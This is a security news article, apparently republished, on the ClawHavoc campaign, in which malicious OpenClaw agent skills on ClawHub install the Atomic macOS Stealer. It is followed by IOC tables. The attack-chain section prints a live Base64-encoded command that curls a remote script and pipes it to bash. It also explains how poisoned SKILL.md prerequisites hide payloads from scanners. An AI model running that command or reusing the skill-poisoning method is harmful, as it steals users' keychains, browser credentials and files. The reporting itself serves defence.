By rssfeeds-admin 
Security firms SlowMist and Koi Security have uncovered hundreds of compromised extensions deploying infostealers like Atomic Stealer.
OpenClaw enables local AI agents to automate workflows, interact with services, and control devices through “skills” modular extensions hosted on ClawHub.
Skills follow the AgentSkills spec, primarily as SKILL.md folders containing executable instructions rather than auditable code. This design shifts Markdown from documentation to operational entry points, making it ripe for abuse.
ClawHub’s permissive upload process lacks rigorous reviews, mirroring vulnerabilities in npm or VS Code marketplaces. Popularity surged recently, drawing developers and attackers alike.
Koi Security scanned 2,857 ClawHub skills, identifying 341 malicious ones 12% infection rate in a campaign dubbed ClawHavoc. SlowMist consolidated IOCs from over 400 samples, noting 472 affected skills with shared infrastructure.
Malicious skills cluster around crypto tools (e.g., Solana trackers, Phantom wallets), YouTube utilities, Polymarket bots, and typosquats like “clawhub1.” They masquerade as updaters, security checks, or finance aids to bypass vigilance.
Attack Chain Breakdown
Attackers embed two-stage payloads in SKILL.md “prerequisites.” Users decode Base64-obfuscated commands like echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash, triggering curl | bash downloads.
First-stage droppers fetch scripts from IPs like 91.92.242.30, then pull second-stage binaries (e.g., x5ki60w1ih838sp7). These are ad-hoc signed Mach-O universals matching Atomic macOS Stealer (AMOS), which copies Desktop/Documents data, exfiltrates to C2s like socifiapp.com, and steals Keychain/browser creds, according to SlowMist analysis.
Dynamic analysis reveals phishing dialogs for passwords, ZIP archiving of .txt/.pdf files, and uploads via curl. Reuse of domains/IPs (e.g., 91.92.242.30 linked to Poseidon extortion group) indicates organized operations.
A popular “X (Twitter) Trends” skill hides Base64 backdoors mimicking config output. Decoding yields downloads from 91.92.242.30/q0c7ew2ro8l2cfqp, chaining to dyrtvwjfveyxjf23 a stealer targeting macOS folders. This evades keyword scanners while enabling rapid payload swaps.
IOCs
Domain IOCs
| Type | Indicator |
|---|---|
| Domain | socifiapp[.]com |
| Domain | rentry[.]co |
| Domain | install[.]app-distribution.net |
URL IOCs
| Type | Indicator |
|---|---|
| URL | hxxp[:]//91.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//91.92.242.30/x5ki60w1ih838sp7 |
| URL | hxxp[:]//91.92.242.30/528n21ktxu08pmer |
| URL | hxxp[:]//91.92.242.30/66hfqv0uye23dkt2 |
| URL | hxxp[:]//91.92.242.30/6x8c0trkp4l9uugo |
| URL | hxxp[:]//91.92.242.30/dx2w5j5bka6qkwxi |
| URL | hxxp[:]//54.91.154.110:13338/ |
| URL | hxxp[:]//91.92.242.30/6wioz8285kcbax6v |
| URL | hxxp[:]//91.92.242.30/1v07y9e1m6v7thl6 |
| URL | hxxp[:]//91.92.242.30/q0c7ew2ro8l2cfqp |
| URL | hxxp[:]//91.92.242.30/dyrtvwjfveyxjf23 |
| URL | hxxps[:]//rentry.co/openclaw-core |
| URL | hxxps[:]//glot.io/snippets/hfdxv8uyaf |
| URL | hxxp[:]//92.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//95.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxps[:]//install.app-distribution.net/setup/ |
| URL | hxxp[:]//11.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//202.161.50.59/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//96.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxps[:]//glot.io/snippets/hfd3x9ueu5 |
IP IOCs
| Type | Indicator |
|---|---|
| IP | 91.92.242[.]30 |
| IP | 104.18.38[.]233 |
| IP | 95.92.242[.]30 |
| IP | 54.91.154[.]110 |
| IP | 92.92.242[.]30 |
| IP | 11.92.242[.]30 |
| IP | 202.161.50[.]59 |
| IP | 96.92.242[.]30 |
File IOCs
| Type | Filename | SHA256 |
|---|---|---|
| File | dyrtvwjfveyxjf23 | 30f97ae88f8861eeadeb54854d47078724e52e2ef36dd847180663b7f5763168 |
| File | 66hfqv0uye23dkt2 | 0e52566ccff4830e30ef45d2ad804eefba4ffe42062919398bf1334aab74dd65 |
| File | x5ki60w1ih838sp7 | 1e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298 |
| File | dx2w5j5bka6qkwxi | 998c38b430097479b015a68d9435dc5b98684119739572a4dff11e085881187e |
| File | openclaw-agent.exe | 17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283 |
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post OpenClaw Becomes New Target in Rising Wave of Supply Chain Poisoning Attacks appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.